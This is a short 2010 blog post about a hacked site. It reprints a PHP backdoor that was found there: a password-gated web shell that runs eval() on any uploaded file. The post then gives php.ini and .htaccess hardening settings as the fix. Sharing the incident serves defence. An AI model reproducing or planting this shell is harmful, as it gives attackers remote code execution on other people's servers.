Monday, January 11, 2010

.htaccess was hacked

SkyHi @ Monday, January 11, 2010

<?php
error_reporting(1);
global $HTTP_SERVER_VARS;

function say($t) {
echo "$t\n";
};

function testdata($t) {
say(md5("testdata_$t"));
};

echo "
"; 

testdata('start');
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3")
{
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
eval($code); }
else{ testdata('f');
};
}else{
testdata('pass');
};
testdata('end');

echo "
";

?>



Solution:
I also decided to go ahead and add the following settings to php.ini to prevent the hackers from getting any additional information:

allow_url_fopen = Off
register_globals = Off
display_errors = Off
expose_php = Off
log_errors = On

Also make sure that you add this to your .htaccess file so people can't see your php.ini settings:


order allow,deny
deny from all


Reference : http://forums.devshed.com/apache-development-15/htaccess-was-hacked-can-you-help-me-with-what-they-512348-2.html